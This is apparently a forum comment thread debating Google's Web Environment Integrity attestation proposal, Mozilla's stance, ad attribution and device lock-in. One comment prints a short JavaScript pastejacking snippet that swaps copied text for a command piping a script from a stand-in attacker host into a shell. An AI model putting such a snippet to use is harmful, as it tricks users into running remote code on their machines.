I haven't seen anything yet on whether Brave will support it, though if I'm understanding correctly, they won't have a choice since they're using Chromium. Hopefully I'm misinformed.
Ultimately I think we must permanently return to browser ballots backed by the law, like the IE bundling fallout. Otherwise friction and incentives will continue to entrench one dominant player.
After all, Google is the one that pays their bills so either way Mozilla is beyond powerless.
Mozilla, the browser, is great.
Mozilla efforts, such as Rust, have been historically great.
Mozilla leadership is currently awful. Their focus is on the wrong things - web VR and low-quality foundational AI models. Maybe because they think the web is at risk of disappearing outright. But the true enemy is Google, and they're currently its well-behaved prisoner.
Mozilla can't bite the hand that feeds it, but someone needs to point the FTC, Congress, and the EU at Google. Everything they do, buy, and work on is to point an overwhelming majority of internet users at its ad products. Chrome, Search, Android, YouTube, Apple default search engine deal, etc. Google has become inescapable. And that's rather anti-competitive if you're trying to advertise your business or selling ad tech.
Never mind that the web commons and standards are constantly in Google's blast radius for funneling everyone into their gaping maw.
{Platform-vendor/developer/end-user}-neutral is more like it.
At the end of the day, users will just see that a website works in Chrome and not in Firefox. Firefox will decide that there is no point in opposing it if there is a real cost in potential market-share.
It feels weird that I'm now grateful for how crap they are.
Microsoft and Apple don't have a good history so assuming there is something big here?
The average person is very likely to have malware on their computer, but not on their phone.
How to design a website that is not accessible with Chrome. As a means of protest by certain website operators.
Would be fun to watch Google circumvent that. Especially if it was only popular amongst small, noncommercial websites.
From what I understand, the arguments about self-preferencing kind of always get thrown out due to a more strict interpretation of the law. Did with Apple, and with Facebook when they were acquiring Instagram and Whatsapp.
https://webkit.org/standards-positions/
(this one has not landed yet, likely to be opposed as well)
I installed lineageOS, which passes the Google SafetyNet check out-of-the-box. So most things just work, including my local Credit Union's app.
But lineageOS fails the CTS profile check on my phone. Fidelity checks this after you log in and shows a "For security reasons your account has been blocked..." message.
So I had to root the phone to install a CTS profile fixer, and then more hacks to hide the fact it was rooted.
After that Fidelity worked, but requested root permission every time I launched it until I figured out how to permanently disable that.
Netflix was similar, but not quite as annoying.
Assistive technologies will still work as the browsers implement platform's assistive APIs.
Automatic testing will still work because a developer isn't going to add restrictions to their own tests from their site. Unless they are testing if a captcha gets shown from an unsafe environment.
Archives, search engines, and spiders should already be respecting robots.txt. Site owners can already block those things if they don't want their site crawled.
>This means that no single party decides which form-factors, devices, operating systems, and browsers may access the Web.
The proposal allows anyone to become an attestor. There would not be a single attestor who you would have to prove your trustworthiness to.
I don't see why it would be that difficult. The issue here is with websites that want to mandate it.
You hit a physical button and an internal kvm switches usb input and displayport out between primary and secondary machine. There is no shared clipboard or way for data to be intentionally shared between machines and nothing to distinguish this setup from any other "secure" setup to disallow its use. It ticks the correct boxes to meet the described intent of the feature and unlike a secure environment one is obliged to use for everything would actually be more secure as you have no good reason to install a bunch of software or browse random websites on the slower secure environment.
For example it is currently the reality in EU, that in order to use any of the native banking apps, a user has no choice but to expose themselves to privacy violations by either Google or Apple, i.e. US companies.
While at least one alternative exists, https://grapheneos.org/articles/attestation-compatibility-gu..., these alternatives are not being used in practice.
I see no way of preventing this happening on the web as well, if the Web Environment Integrity API ships.
Although I do agree that means there's less competition in the browser engine world.
We should start to orient the debate instead on the security issues created by Google and their ads.
Note that "safety and security" has become an abhorrent phrase among many of us because it evokes the "authoritarian dystopia" that Google et al. are creating --- we're more concerned about freedom and interoperability.
But rather than block them outright, I would disable all but the necessary features and keep reminding those users to either switch to another browser or to use something like tampermonkey (with clear instructions in what it needs to do).
What would be a good way to detect support for this stuff? The js api?
If you are shown a product ad whilst browsing searchengine.example and then later look up the product at reviews.example, then end up making a purchase at shop.example, your Mozilla browser will send all of these events to one or more aggregation services that allows shop.example to understand (at least in aggregate, assuming you trust the cartels running the aggregation services) that you were exposed to their product at searchengine.example and further exposed to their product at reviews.example.
Where previously an ad tech company was ultimately able to track users based on source IP address (even if cookies had been disabled by a user), IPA now allows these companies to track users across multiple IP addresses, and regardless of the user's cookie settings, via a unique tracking identifier. It is also proposed that the operating system provides the unique tracking identifier which can then be used by all applications or browsers on a device, allowing different devices behind a single IP address to be distinguished.
Is that sarcasm? Their computer is likely more secure than the jungle of manufacturer modified roms where who knows what's inside.
[1] https://github.com/mozilla/standards-positions/issues/753
[2] https://github.com/WebKit/standards-positions/issues/142
The goal of device attestation for consumer software is to put an end to that. Originally pioneered by Apple on iOS, now making its way to all of computing thanks to the forces of capitalism, device attestation means that the hackers lose. It is the bad ending.
The other twin threat, and I hate to say it, is the software industry sorting its security story out. In the past iOS jailbreaks used to be common, but there hasn't been an iOS jailbreak in a year. Rust isn't helping.
We are hurtling towards a world where producers and IP holders have complete control over the content they produce, and use leading-edge cryptography and ultra-secure consumer-hostile software to keep it that way. This is one of the most dangerous developments to ever happen in all of history, and once it's real there's no going back.
Stallman was right.
Either this protocol is useless for its intended purpose, or banks will only accept a small handful of attestors that promise not to sign for environments where the owner has control. Being able to create a new attestor means nothing because attestation is not valuable without pre-established trust.
The fraud prevention use case requires that the browser matches what Google or Mozilla shipped, not what I choose to actually run. From 10,000 feet in the sky, there's zero difference between, say, someone who installed modified software on their phone to protect their privacy and someone who was tricked into installing malware[0]. Banks don't care about your freedom, they care about making your fraud someone else's fault.
Some of the use cases explicitly call for locking the owner out of their device too. Anticheat in games is treated as at least beneficial to honest users, but it can still be user hostile[1]. Click fraud detection shouldn't even be something that a USER agent cares about - and it's not like Google cares about that anyway[2].
Practically speaking the only Linux distros that will get an attestor that anyone will actually care about will be Chrome OS and Play-certified Android. At best, Google agrees to attest for Chrome and Firefox on non-Chrome-OS Linux and it winds up being like EME did. At worst everyone has to buy a Windows license just to use most websites anymore.
>Assistive technologies will still work as the browsers implement platform's assistive APIs.
At least until someone says "we need to keep content from being data mined for AI training[3]" and AI scrapers find out how to automate those APIs. The underlying power dynamic of attestation means that websites can just demand attestors ban screen readers, in the same way that ebook DRM already does.
[0] Casual reminder that Louis Rossman was harassed by the GrapheneOS developer for agreeing with someone that the developer asserted had harassed them. He uninstalled GrapheneOS specifically to avoid being pwned by its developer.
[1] Let me remind you of the insane cat-and-mouse game where cheaters went into the kernel, so now anticheat is in the kernel, and now cheaters find vulns in the anticheat to hide their cheats in, which now malware can use as well.
[2] https://www.theregister.com/2023/06/29/google_trueview_skept...
[3] Reddit
Most of these private attribution systems are specifically designed so that the people running the ad can count how many people clicked their ads, but not who clicked them or what other things they did. Safari had a proposal in which you could only have a certain number of campaigns running per domain, so you couldn't set up a separate """campaign""" for each user and fingerprint them all at once. I don't know how the Mozilla proposal differs.
Whether or not user-agents should care about this sort of thing is an orthogonal question.
[0] https://www.theregister.com/2023/06/29/google_trueview_skept...
[1] Remarketing in particular is responsible for the "feeling of being seen" from modern ads where you search for one thing and get 10,000 ads for the thing for the next week
Assuming this gets implemented, users might start being unable to access certain websites or services because their identity is deemed "insufficient", which would move them to use a different browser that does not have this.
Something strange. So, radio advertisement, billboards, video panels, and absolutely any other type of advertisement is a scam that exists for few decades and still going good?
User Agent. Not advertiser agent, not government agent. USER AGENT!
Yes, and since "attribution" as defined here is incompatible with user's privacy (which is a human right), therefore advertising should fail. Can it please fail early and fail often?
|--------------------|
anti-user     pro-user
Where on the scale is "failure"? Let's say Mozilla is on the M, and Google is on the G:
|----G-------M-------|
anti-user     pro-user
Is Mozilla failing?
The sentiment I seem to see is that anything short of perfect is failure.
Because their customers aren't security nerds that have smartphones with authentication apps.
They want people that barely get smartphones, or still use feature phones, to be able to access their services with some improved security workflows.
It means that each site can choose who they trust instead of there being a single entity dictating what users are secure or not.
>Click fraud detection shouldn't even be something that a USER agent cares about
But it is something that the web standard should think about in order to make the web a better place.
>Practically speaking the only Linux distros that will get an attestor that anyone will actually care about will be Chrome OS and Play-certified Android.
I disagree. There are several Linux distros that support secureboot showing that Linux distros are capable of showing they are trustworthy enough to Microsoft.
No, attribution is what advertisers want, to do the least amount of work possible to blast you with ads that attack your deepest weaknesses, all under the pretense of "personalization".
> then the ad platform will defraud you[0]
Cool. How is that my problem as a user ? Grow a set of balls and sue the ad platform.
https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b...
The Mac front end uses macOS APIs and Apple is super selective which ones they port to Windows and WebKit would force them to open source this.
"blast you with ads that attack your deepest weaknesses, all under the pretense of "personalization"."
Instead it will tell advertisers how effective their blast was, and help argue that Google isn't defrauding them.
Maybe web is the right platform for these. But of course Google will use this to close things down.
...if you let it.
|------------B---A---|
anti-user     pro-user
Is Mozilla still, currently, a failure at their job?
---
These kinds of discussions are frustrating to me since it feels like we've been dealt a very bad hand. But it's not just this hand, the dealer is firmly set on us only receiving bad hands in any game we play.
Like in a card game, this is the only hand that we'll get. What other corporation do we have to push these kinds of values? What other avenue do we have? It's sad that we've come to this situation, but if the choice is the currently perceived-to-be-failing Mozilla and no Mozilla, I pick the failing Mozilla.
Imagine we fully lose the web because iOS opens up.
Pocket, cliq, Push Notifications for Mozilla Blog without user consent, Mr robot, Firefox Suggest etc they are littered with mistakes and scandals and have never improved their governance or process.
I can give them a pass on technical decisions like Thunderbird or breaking extensions but when it's purely commercial it has to be judged differently.
This is quite different than the current design of online ads, where which ad to show is only decided when the ad loads and reloads.
Not that it matters that much - online ads are a total scam anyway. Particularly google's search ads, which 9 times out of 10 is just a copy of the first search result - but now in a version where they get money for the click.
It is however what the advertisement companies and agencies want. They are selling shitty products.
When buying internet ad space, though, the information asymmetry is vastly different.
When a shirt is white and clean, the smallest stain stands out.
Mozilla is one of the rare companies with a mostly white clean shirt.
It is being judged harshly, while we should rejoice that they have been doing amazing things for 20 years despite the competition being terrible people playing dirty.
If we keep doing this, there will be no more Mozilla in the world. Who wants to be the good guys if you are held up against impossible standards when your competitors are paid handsomely to destroy the world?
I know some groups that target perfect ethics: they do nothing, because it's impossible to do anything without screwing up sometimes.
What prevents any of the following solutions from providing assurance to advertising clients, without also destroying the Internet and general purpose computing:
1. Building trust with advertising clients by treating them with respect, honesty and transparency. If your clients don't trust your advertising network and were demanding assurances in the form of WEI and similar proposals, surely it's obvious there are bigger problems. The advertising client would likely have dropped the advertising network long ago but can't due to monopolies existing.
2. Advertising networks undergo independent audits (results available to clients) and become more transparent to clients in how their advertising spend is being used.
3. Advertising clients survey users at checkout to ask whether they found the product/service from an advert, or whether they recall seeing an advertising campaign and where they remember seeing it.
4. Advertising clients host advertisements at ads.company.example (in a few highly restricted formats) so they can keep track of impressions themselves.
5. (still a bad idea, based on user surveys, but one which Google et al should have considered for minimisation of data collection and privacy impact) Browsers collect advertising metrics during use and when a user makes a transaction at an online store, the online store asks the user (via the browser) for permission to obtain those saved advertising metrics to provide only to the online store. Users can review the entirety of information sent to the online store before it is sent. Advertising networks don't have a need to access browsing history for everyone on the Internet in real time.
6. Online stores and similar continue to rotate their marketing spend through various advertising networks and marketing campaigns, checking their own metrics to see if advertising campaigns have been having an impact. Campaigns could include marketing using the Internet but outside the reach of Google et al such as use of campaign-specific coupons and products marketed through product review websites, referral schemes, influencers, etc.
1. The attacker manufactures a device, such as a smartphone, generates a keypair for it, stores it on an HSM on the device (generally called a "trusted enclave"), and signs the public key of the keypair with a master key
2. The device runs the attacker's software and is designed so that whenever non-attacker software is run with elevated privileges, the HSM is informed of that fact in a way that can't be reset without rebooting (and starting again with the attacker's software). For instance, the device might use a verified boot scheme, send the key the OS is signed with to the HSM in a way that is unchangeable until reboot, and it might employ hardening like having the CPU encrypt RAM or apply an HMAC to RAM
3. The HSM produces signatures of messages that contain statements that the device is running the attacker's software, plus whatever the attacker's software wants to communicate and it won't produce them if it's running software of the user's choice as opposed to the attacker's software as established above. It also includes the signature of its public key with the master keypair, allowing accomplices to check that the device is indeed not under the user's control, but rather under the control of someone they trust to effectively limit the user's freedom
4. Optionally, that attestation is passed through the attacker's servers, which check it and return another attestation signed by themselves, allowing to anonymize the device and apply arbitrary other criteria
5. Conniving third parties can thus use this scheme to ensure that they are interacting with a device running the attacker's software, and thus that the device is restricting the user behavior as the attacker specifies. For instance, it can ensure that the device is running the accomplice's code unmodified, preventing the user from being able to run software of their choice, and it can ensure that the user is using device as desired by the attacker and their accomplices.
This attack is already running against Android smartphone users (orchestrated by Google, in the form of SafetyNet and the Play Integrity API) and iOS smartphone users (orchestrated by Apple) and this extends the attack to the web.
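The signature chain described in steps 1-3 and 5 above, seen from the relying party's side, as an added example that is not part of the original comment or of any real attestation API. Ed25519, the JSON statement format and every type and function name here are assumptions made for the illustration; the optional re-signing server from step 4 is left out.

```go
package main

import (
	"crypto/ed25519"
	"encoding/json"
	"errors"
	"fmt"
)

var ErrRefused = errors.New("key store refuses to attest: unverified boot state")
var ErrUntrustedVendor = errors.New("device key not certified by a trusted vendor key")
var ErrBadSignature = errors.New("statement signature invalid")
var ErrReplay = errors.New("nonce mismatch")

// Statement is what the device key signs; a valid signature is itself the claim
// that vendor software is running, because the key store refuses otherwise.
type Statement struct {
	Nonce   string `json:"nonce"`   // relying party's challenge, stops replay
	Payload string `json:"payload"` // whatever the vendor software reports
}

// Attestation carries the statement plus both links of the signature chain.
type Attestation struct {
	StatementJSON []byte
	StatementSig  []byte            // made with the device key
	DevicePub     ed25519.PublicKey // device public key
	DeviceCert    []byte            // vendor master key's signature over DevicePub
}

// Device models the hardware key store from steps 1 and 2 (hypothetical type).
type Device struct {
	priv         ed25519.PrivateKey
	pub          ed25519.PublicKey
	cert         []byte
	verifiedBoot bool
}

// NewVendorKey creates a vendor master keypair (constructed for the example).
func NewVendorKey() (ed25519.PublicKey, ed25519.PrivateKey, error) {
	return ed25519.GenerateKey(nil) // nil selects crypto/rand.Reader
}

// Provision is step 1: generate a device key and certify it with the master key.
func Provision(master ed25519.PrivateKey) (*Device, error) {
	pub, priv, err := ed25519.GenerateKey(nil)
	if err != nil {
		return nil, err
	}
	return &Device{priv: priv, pub: pub, cert: ed25519.Sign(master, pub), verifiedBoot: true}, nil
}

// BootUserOS is step 2: the flag flips and stays flipped until a reboot.
func (d *Device) BootUserOS() { d.verifiedBoot = false }

// Attest is step 3: sign a statement only while the vendor's software is running.
func (d *Device) Attest(nonce, payload string) (Attestation, error) {
	if !d.verifiedBoot {
		return Attestation{}, ErrRefused
	}
	body, err := json.Marshal(Statement{Nonce: nonce, Payload: payload})
	if err != nil {
		return Attestation{}, err
	}
	return Attestation{StatementJSON: body, StatementSig: ed25519.Sign(d.priv, body),
		DevicePub: d.pub, DeviceCert: d.cert}, nil
}

// Verify is step 5. It shows only that a key certified by a vendor on the
// caller's trust list signed the statement, not that the device is malware-free.
func Verify(a Attestation, nonce string, trusted ...ed25519.PublicKey) (*Statement, error) {
	certified := false
	for _, master := range trusted {
		certified = certified || ed25519.Verify(master, a.DevicePub, a.DeviceCert)
	}
	if !certified || len(a.DevicePub) != ed25519.PublicKeySize {
		return nil, ErrUntrustedVendor
	}
	if !ed25519.Verify(a.DevicePub, a.StatementJSON, a.StatementSig) {
		return nil, ErrBadSignature
	}
	var s Statement
	if err := json.Unmarshal(a.StatementJSON, &s); err != nil {
		return nil, err
	}
	if s.Nonce != nonce {
		return nil, ErrReplay
	}
	return &s, nil
}

func main() {
	vendorPub, vendorPriv, _ := NewVendorKey()
	dev, _ := Provision(vendorPriv)
	a, _ := dev.Attest("nonce-1", "hello")
	_, err := Verify(a, "nonce-1", vendorPub)
	dev.BootUserOS()
	_, refused := dev.Attest("nonce-2", "hello")
	fmt.Println("accepted while locked:", err == nil, "| after owner boots own OS:", refused)
}
```

An attestation from a device provisioned under a different master key verifies only when the relying party adds that key to its trust list, which is the pre-established trust the thread argues about.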
IMO much bigger issue is that significant amount of non-banking sites that are now trying to shame user with "disable adblocker to continue" messages (easily bypassed) will start requiring this. Or Twitter/Reddit/etc., in the name of "fighting bots" of course, nothing to do with ensuring you are watching their ads...
And speaking of Microsoft - I am using Thunderbird 102.6.1, since any newer version doesn't work for me with Outlook365 - MS OAuth implementation requires user agent to be accepted by some "administrator". Looks like great example of what we can expect from Google, even if that Web Integrity get delayed for few years. Mozilla really is powerless - either they cave in, like with video DRM - or their browser won't be useful as daily driver
Additionally, AntiFraudCG proposals such as WEI focus on benefits they provide to PATCG proposals. For example, a Googler with historical interest in minimising inflated view counts on YouTube[4] (a benefit to YouTube's advertisers) wrote earlier this year a proposal to AntiFraudCG including:
"By transmitting signals of legitimacy from the device’s platform, such as if the device is emulated or rooted, publishers and their technology partners could use this information in part to determine if traffic is invalid. They could then choose appropriate actions like flagging advertising actions as suspicious"[5]
[2] https://github.com/antifraudcg
[3] https://www.mozilla.org/en-US/mission/
[4] https://security.googleblog.com/2014/02/keeping-youtube-view...
Of course, there's also criticism for attempting those.
Maybe, but what does that change? It might even be a stronger lever to pull than "we will stop sending you traffic". My point is that Google isn't donating money to Mozilla because it's nice, it pays for something (traffic / legal protection / whatever). I just don't see how the parent idea that Mozilla must comply with Google because Google "pays their bills" holds.
This Web Integrity API is just a means to cement themselves as obligatory man in the middle, as opposed to an optional one.
Seems like a good record to me.
Unless you have billions at a bank, I don't see why any bank would even consider changing how their website works because of a single customer. And, well, real billionaires probably don't care about not being able to use a website on Firefox.
Okay. So this is about validating ad effectiveness and minimizing ad fraud, right?
Assuming that's your point (apologies if I'm missing something important), what does that have to do with me or my private property?
Advertisers have business relationships with advertising platforms. Advertisers might also have a business relationship with me, assuming I choose to purchase their product(s).
But the advertising platform has no business relationship with me (assuming I'm not buying ads on that platform). As such, why do I have to give data, CPU cycles and privacy so the advertising platform can provide metrics about ad effectiveness and fraud?
None of that has anything to do with me, and I don't wish to give up those things (especially my privacy) on the devices I own.
It's unethical for these rapacious scumbags to limit what I can do on my devices (which are my private property) if I refuse to provide third (the ad platform) and fourth (the advertisers) parties specific information about who I am and what I see or don't see (which is what a permanent identifier in secure storage would do) when I visit a site of my choosing.
I'll say it again to make sure I'm clear: I don't care about advertisers or ad platforms. They can go and play with each other all they want -- but don't limit what I can do on my devices because it will make you more money. Fuck. That. Noise.
Edit: Clarified prose.
I'd love to donate to Mozilla, but I'm concerned my money could just end up in some C-suite pockets if I do. Is there a way to donate specifically to Firefox core(-ish) team, and maybe also MDN?
I got codes via SMS when I installed those apps and I had to prove that I owned the phone number I was associating with the app.
And websites get to choose which attestors they accept. For an attestor to do what they are expected to do, they need control of everything from the TPM up. This means there will be effectively 3 attestors - the major operating system vendors.
They get hate only for bad or useless things (like the famous "independent voices") but a lot of love for the actual work being done, especially Firefox Containers, enormous performance improvements etc. I'm using Firefox on a daily basis and just the Containers feature make it so much superior to Chrome.
For a "fun" example of how strict budget destination restrictions fail, take a look at Atlanta's MARTA, that used to have a fixed 50/50 budget split between OPEX and CAPEX by its funding law, and therefore had brand new trains but everything else falling apart.
- OP responds with “what about IPA”
It's literal whataboutism.
Happy to say, Google just fixed it (about 4 months ago).
Many free cross-browser testing tools still can demonstrate the breakage (via version testing).
Basic malware JavaScript snippet:
<script>
  // On copy from the #copy element, the handler replaces the copied text
  // with a different command and suppresses the browser's default copy.
  document.getElementById('copy').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
      'curl http://attacker-domain:8000/shell.sh | sh\n');
    e.preventDefault();
  });
</script>
> Assistive technologies will still work as the browsers implement platform's assistive APIs.
Assistive technologies and APIs on devices should not be beholden to the platform owners. It is a problem for disabled communities to need to ask permission to build technologies that make their lives better.
Native platform accessibility APIs are important because it's important for platforms to take steps to guarantee equitable access to sites and apps on their own platforms out of the box and for ordinary users who may not want to or be able to install additional software. However, officially supported native platform accessibility APIs are NEVER an excuse to remove the autonomy and agency of disabled communities.
This shows up all the time in multiple situations -- from Reddit's exemptions of nebulously defined accessibility apps from its API pricing to circumventing assistive technologies in the name of adblocking, to the current proposal. It is an attack on the autonomy and agency of vision impaired or low-mobility users to force them to use only "approved" APIs in order to build assistive technologies or to force them to ask permission before deploying their solutions. It positions the platform as a kind of benevolent dictator, giving the platform an inappropriate level of power and control over disabled communities that should be (when possible) dismantled rather than reinforced.
We're not holding Mozilla to higher standards than Google - we just have already discarded Google as an option.
Not collecting telemetry that many users have explicitly stated they do not want and even turned off at every opportunity is not a particularly high standard. Not wanting advertisements integrated into the web browser is not a particularly high standard. Criticizing that the CEO salary has been increasing to absurd levels while the browser has been declining and regular engineers are facing is not holding them to a particularly high standard. Not wanting the last remaining competitive free web browser run as a commercial project rather than a non-profit foundation is not a high standard. Mozilla chooses to be shittier and shittier. Inaction would be better.
|--------------------|
anti-user     pro-user
Where on the scale is "failure"? Let's say Putin is on the P, and Hitler is on the H:
|----H-------P-------|
anti-user     pro-user
Is Putin evil?
The sentiment I seem to see is that anything short of sainthood is evil.
The answer of course is that relativism is not a good way to judge people or organizations. Mozilla chooses to do a lot of shitty things. They should be criticized for that even if someone else is worse.
The thing is, Mozilla shouldn't even be a for-profit corporation in the first place.
My bank calls me once every few months, if everything is ok, and if there is something that is bothering me and could be improved, or if they can help with something. At first I thought it is some marketing program and some manager has to achieve some KPIs, but surprisingly, they did listen to suggestions (it took time, but they eventually did).
So you never know, if you never try.
[M. theresa...VLC foundation....Mozilla.......You.......................Microsoft.......................................Nazis]
I think your comment only shows how spoiled we are by open source.
They're working on it, see Manifest v3.
Which is the scale of Mozilla "badness" compared to the rest, even you.
And especially in the light of the good things they do.
You can be a critic, but be so in balance with the good things, otherwise you are making doing good something so ingrate a lot of people will give up.
If you think doing the right thing is easy, you have not been doing a lot of it.
Problem is that Chrome is massive. If Chrome decides it will go left, most of websites will go left.
If you want to compare with Google the list is way more subjective.
I'm not a tinfoil hat, but security can't hang its hat on the kindness of strangers.
They don't give a single shit about my happiness, as long as I buy their product. Whether that's through a happy ad that made me laugh, or through being blasted with it every day for a year so that their brand is the only one I think of when I need to buy X.
Companies do not see you as a person. They don't even lack empathy, they didn't have any to begin with. You're a walking wallet they have to empty, by any means necessary, and if that's through making you feel that you're ugly and you should buy their new skincare, they will.
[0] https://us.boell.org/en/2019/10/17/web-partner-companies-kee...
[1] https://tvpworld.com/40781592/another-letter-from-us-ambassa...
Alright, let's see the next senten-
>It's about proving to advertisement customers that their ads were seen and were useful.
So, it's about making sure that the ads that they showed me were personalized enough that they accurately target me. Ads that are built to be efficient because they create a need from a very small part in me that can normally be reasoned with. Or attack some deep seated fears to make me purchase their magic fat loss pills, that they accurately targeted because of attribution, and because of being repeatedly told how effective their blasts are.
So it's about personalization, got it.
There are major usability problems, mostly related to graphics (the protocol that forwards the windows is purposefully dumb and doesn't support 3D acceleration at all), but for things like browsing bank apps or even watching youtube it's enough.
Google should be split so that the interests of Google'd not taint Android and Chrome.
1. From what I've seen, the PSD2 APIs haven't really been created with end users in mind – there are non-trivial accreditation requirements on people/entities wishing to make use of those APIs, the expectation being that only professional middlemen will dally with those APIs.
2. The PSD2 APIs don't necessarily cover the full functionality of a bank's online banking functionality.
3. While you can probably still get quite far with "just" the ability to query the current account data and recent transactions, as well as being able to initiate payments, this doesn't sidestep the bank's authorisation requirements – meaning that unless you can use a hardware TAN generator or something like that, you're still dependent on the bank's app for payment and account access authorisation.
No. Not even close.
> while we should rejoice that they have been doing amazing things for 20 years despite the competition being terrible people playing dirty.
I reject the "other"-ness in this comment. I was a Mozillian. I was helping do those things. The notion that I should heap accolades upon a bunch of folks who are only now affiliated with Mozilla and who were not contributing during the era in which Mozilla was doing the great things actually deserving of the goodwill associated with its name? And who have themselves been positively poor torchbearers for that name? Condescending.
2023 is the project's 25th birthday. It did amazing things for about 15 of them—by which I mean the people who made up the project. "Mozilla" is merely a legal fiction.
I do recall it being common for internet ads to be sold directly like billboards back in the day, before the action model took over, especially for higher value sites that could be likened to the prime real estate of a billboard on a city square or key highway with their guaranteed literal traffic.
But such direct deals probably didn't scale well, and definitely left smaller sites wanting to earn some extra revenue in the dust. There was a time when ads weren't as shit as they are now - most wouldn't worry about a banner ad or two on their favorite forum.
It's not really optional. At least, not unless you consider online banking to be optional.
Is there any threshold for mendacity that if crossed would bother you?
Highly abstract risks just don't seem to register for most people. It was hard enough to get the masses to act in self interest over an existential risk to their health (covid).
I reckon the way to avoid maximum damage from this proposal will be some sort of inoculation - e.g. safe, trusted, easy to use tools that help people work around it. The political angle of attack is worth trying but I think it will fail.
I wish Mozilla worked that angle too - e.g. supporting lineage and microg.
That was the intention behind my choice of words — representing the whole web, not just components of it or companies operating on it.
In what way does it make the web a better place?
That's exactly the thing, this integrity api only means the device is controlled, not secure, that's two very different things. You can have a phone riddled with pre-installed malware passing the safety net and you can have EOS, the cleanest rom that I know about which can fail it.
The majority of companies are small to medium businesses that do actually care about their customers - when your customers are measured in thousands or less instead of billions, you will go belly up if you don't. They still use ads because how the heck would you otherwise know they even existed, and yes they want you to buy stuff but they hope you actually like the product afterwards so you end up helping them get known.
Think of it a bit like when your favorite tiny, niche YouTube channel uses clickbaity titles and thumbnails, or targets the 10-15 minute mark, or uses the same intro/outro format and duration as everyone else. If they didn't, no one would ever see their videos as they'd get deselected by the algorithm. No one will watch a video, or buy a product, that they do not know exists.
I'm sure OP is glad that Mozilla takes a negative position on WEI, but when they take other positions simultaneously that seem to counter their WEI positioning, that is a legitimate criticism. I share in that view.
I'm glad to see Mozilla push back in a case like this, but they need to do more, and more consistently so.
Remind me, how has that strategy worked out for their market share? Perhaps the market for I-Can't-Believe-It's-Not-Chrome isn't actually that big since those users don't have a problem with just using Chrome.
If the same happens now with remote attestation (and I can totally see that happening on streaming websites), Mozilla will have to risk losing even more of their small user base or relent and make some version of the protocol.
There's no reason your question couldn't have been posted in a relevant (sub)thread, instead of here, where it's (i) not on topic for the current subject, but (ii) looks like it could be, and therefore (iii) has the same effect as moving the goalposts.
I don't think you'll need to buy an SBC for this. A weekend of messing with virtual machines will be enough.
This is a major reason I haven't tried QubesOS yet. Thanks to Nvidia I've seen what happens when you run a desktop with a browser without hardware acceleration and it sucks. CPU cores get pegged with basic scrolling or video playback and power consumption is simply unreasonable.
Perhaps if I were a human rights activist or a journalist I would use it, but I'm not.
Meanwhile there is zero benefit for letting websites manipulate the clipboard or intercept basic browser interactions. This might make sense for applications but that's just another argument why those shouldn't be forced into the same browser as websites.
Websites aren't the only party that might want automated tests.
> Archives, search engines, and spiders should already be respecting robots.txt. Site owners can already block those things if they don't want their site crawled.
robots.txt is not law. Archives, search engines, and spiders SHOULD ignore it in cases where they deem it the more moral action. After all, all of these are supposed to snapshot the web that humans see.
The real reason Google pays Mozilla is probably closer to "controlled opposition" or "antitrust shield".
For it to make sense to open source Safari for Windows, they’d first have to pull out the AppKit bits and replace them with something else.
Who? Oh you mean digg v3?
Who's digg? Exactly....
I stick to Safari and Firefox. They're not perfect but they're the only modern browsers that don't use Blink, which is what gives Google the power to make moves like this.
Not saying it's perfect or better, just that we need it. We need a competing browser with a rendering engine that Google doesn't ultimately control that has a non-trivial market share. Otherwise we may as well just stop complaining and let Google do what it wants because we'll have no power to stop them anyway.
But, is there an actual need to change how internet traffic operates? Is there something currently broken?
Besides, people aren't using relativism here. Relativism is the idea that nothing is truly good or bad, it's all a matter of personal or cultural preferences. That would mean that people were saying that Mozilla's behavior about X, Y, and Z isn't really bad. But that's not really the argument here. People are generally saying that despite engaging in the bad behaviors X,Y and Z, Mozilla is still in balance better than Google, and arguably still worthy of some level of support. To phrase it in terms of Aristotelian ethics: "For the lesser evil can be seen in comparison with the greater evil as a good, since this lesser evil is preferable to the greater one, and whatever preferable is good". You're unquestionably correct that Mozilla should be criticized, even harshly so. But you can criticize a company (or person, or party, or country) and still support them. Or if short of support, still prefer them to the available alternatives.
That's what we do, anyways.
1. Under her leadership Mozilla has lost virtually all of its users. It has been reduced to less than 10% of what it had before, maybe worse - I haven't kept up.
2. At the beginning of Covid, a time when remote work was on the rise and tech valuations were through the roof, a time when the browser was more important than ever, she took her largest payout and fired hundreds of employees. She was compensated at over $5M dollars, enough money to pay a team of engineers for years.
3. Firefox has utterly failed to capture Enterprise market, where Chrome has managed to dominate. I doubt most people are even aware that a corp managed Firefox is an option, they have done such a poor job marketing it.
4. Every initiative Mozilla has come out with has completely failed to gain traction. Something like a VPN could have been a great fit for Mozilla but they did nothing with it. Mozilla has been incapable, organizationally, of capitalizing on technology - the thing they're kinda supposed to do exclusively.
She has failed in every conceivable way as a CEO. She has failed in terms of the mission, she has failed her employees, she has failed her users, she has failed to be an example as a leader.
Mozilla, as it exists today, is a convenient project for Chrome to point to and say "look, there's competition" - perhaps the only reason why Google continues to fund Mozilla.
Microsoft and Apple are at least competently run and have incentives to push to reduce Chrome's power.
With enough websites using this API to block "untrusted" devices, since Google is the one that decides who is "trusted" that gives them an iron grip on what you can use to browse the web.
If they decide to not grant your competing project "trusted" status, you now cannot build a competing device, OS, or browser. And since Google owns the most popular browser and one of the most popular OS that gives them little incentive to allow competition.
Without a "trusted" browser that can scrape the web you are also effectively blocked from building a competing search engine.
Basically this API serves to cement Google into a position of power.
Business account is in different bank, and the communication there was much harder (obviously by someone not trained in communication and having to talk to me as unplanned part of their job). The fees are lower, though.
So it doesn't seem to be by the amount of $$$ on the account.
6. Any additional party with sufficient ability to modify hardware can still attack the attacker and their accomplices. So such parties only benefit from this, at the cost of typical users.
And this "attacker" gets... what? Nothing. Because this isn't an attacker... it's a device manufacturer. You've described how attestation works except you've described the TPM as an attacker, which is silly.
Given that SSO is a massive security win and has been a game changer for removing passwords, I think it's been shown that delegation is extremely effective.
I remember in the long, long ago, when I actually visited a BUILDING to do some of my banking tasks. And when I bought physical media that took up actual 3D space in my house to watch movies. I suspect we aren't incapable of going back.
2. Great, they should do that, but good luck doing that when the data you need to audit is on a bajillion client machines.
3. People do that already
4. This became a thing a while back as a way to defeat third-party tracking blockers in browsers
5. This is literally the attribution system you're arguing against
6. They do that already. But good luck finding an ad marketplace that Google and Facebook don't have their fingers already in.
Also...
> What prevents any of the following solutions from providing assurance to advertising clients, without also destroying the Internet and general purpose computing
